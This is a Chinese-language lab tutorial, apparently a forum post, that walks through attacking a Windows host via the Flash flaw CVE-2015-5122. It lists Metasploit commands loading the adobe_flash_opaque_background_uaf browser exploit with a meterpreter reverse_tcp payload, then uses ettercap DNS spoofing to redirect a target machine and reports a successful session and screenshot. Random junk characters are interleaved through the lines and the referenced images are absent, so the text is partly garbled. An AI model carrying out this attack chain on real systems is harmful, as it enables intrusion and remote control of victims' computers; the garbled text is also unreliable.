5 a$ [8 @; ?* o; \- _+ n 二、cve2015-5122漏洞实例演示虚拟机
+ [& T/ R: D) C
9 S! l7 K$ H1 Q& Y0 g) H
% S" {* Z* N2 u3 E) a. O! n 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
: K" R4 v0 Z* Y
, _2 a8 L+ c. H, D
, X/ B& K& t+ O9 F: A, i: i search cve-2015-5122如图:
5 {, b0 D& T3 y% Y
) }7 V, `* s Y4 H3 j J/ O7 O
_0 W/ i9 q/ p
' z3 k8 b0 F+ j- L. P& p0 N
, {) b2 n {% w% a% j$ Q6 m$ P3 [1 p4 R
下面我们敲如下命令: * @# V9 G0 I) J$ i9 g% [; L* p$ t
5 r% y9 ~, o6 Q3 l( o2 e
* _+ K1 h- ^% T) n+ J use exploit/multi/browser/adobe_flash_opaque_background_uaf
% n: m( F. F7 { V
5 Y2 N; D( `- ?) P9 ^
$ k+ Y- y3 T6 h4 p) \+ d& N" I set PAYLOAD windows/meterpreter/reverse_tcp / L- z* u1 { j3 ~4 O
1 `1 k" W* {, f$ J! o
. b c$ J6 m% V+ I/ w
set LHOST 192.168.0.109
/ `8 I6 l+ j( b) E
3 q/ t0 c; c' O# B+ Q- [
5 @2 [, T- |1 Y5 ^" V0 E set URIPATH / /*根目录*/ ; s% Z6 y$ A2 V- V
7 A, X, X- e: E% n9 S& q$ J x# J i$ X
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
' l' ]! e5 Y& E) M ) t, Z7 u9 j' I
# W! x$ U9 P9 o( r$ i9 o, h set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
# ~6 N/ Q7 ? ]& K. J1 G
* S# l7 ]6 T) [% ]. N+ z! |
; t8 Q1 Q% s( Q+ i: _* m0 g; r 然后show options如图:
' m! K! r* O8 Q1 N ' h9 _( G \+ Z" t+ `! w" n/ U1 T
! u7 l$ x6 Z1 ~7 V/ u, g) t" J R* w2 R
, q6 Z' ^# @3 x 3 Z5 x% t% m' I6 D
$ I; [1 r( y0 ^3 f7 @' Z
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: ( F o) u( P6 |0 J! I
. e0 ?& u& }$ K, m: X$ p7 o
4 z4 S$ V% p8 b; P$ p
5 F. \- f+ ~" E/ p" x 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
9 V0 \% d( A$ @* w , U- d! O7 O. E
- o6 ~' e4 d3 g( @2 U Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 5 i: n0 d: B: @8 m" H8 J
4 [- k6 D. Q$ E( U3 R, x. w
9 d7 W9 p" ?. b) J
6 B/ Z( r$ M" G7 V& S 2 {) G* y J) n( e
3 g" C4 _' ~! g T% @; [: V
成功了,这时候我们断开ettercap,如图:
% B8 p) _; t0 i% U( z5 _5 Z
, K) h [+ o: f( Q" u: z2 K! S6 }/ Q; {0 p% G+ \
, B9 D+ K3 m, S9 Z s
- _5 o7 ]- g& ?( U- @ [4 G# U3 E, o9 V* l! `
Screenshot如图:
2 X" \3 F% a6 H4 ]: g
8 m2 Y' O3 X+ d0 C h
1 |" V. g) U, e' E2 k6 U4 b _5 { 5 r0 F" z7 w- w9 B% W
, s/ t: o a! p) x' Y( X
0 z5 w5 [$ G! B5 p& {, r
" l7 F# c+ ~7 }* v2 n6 k9 R+ H* [ |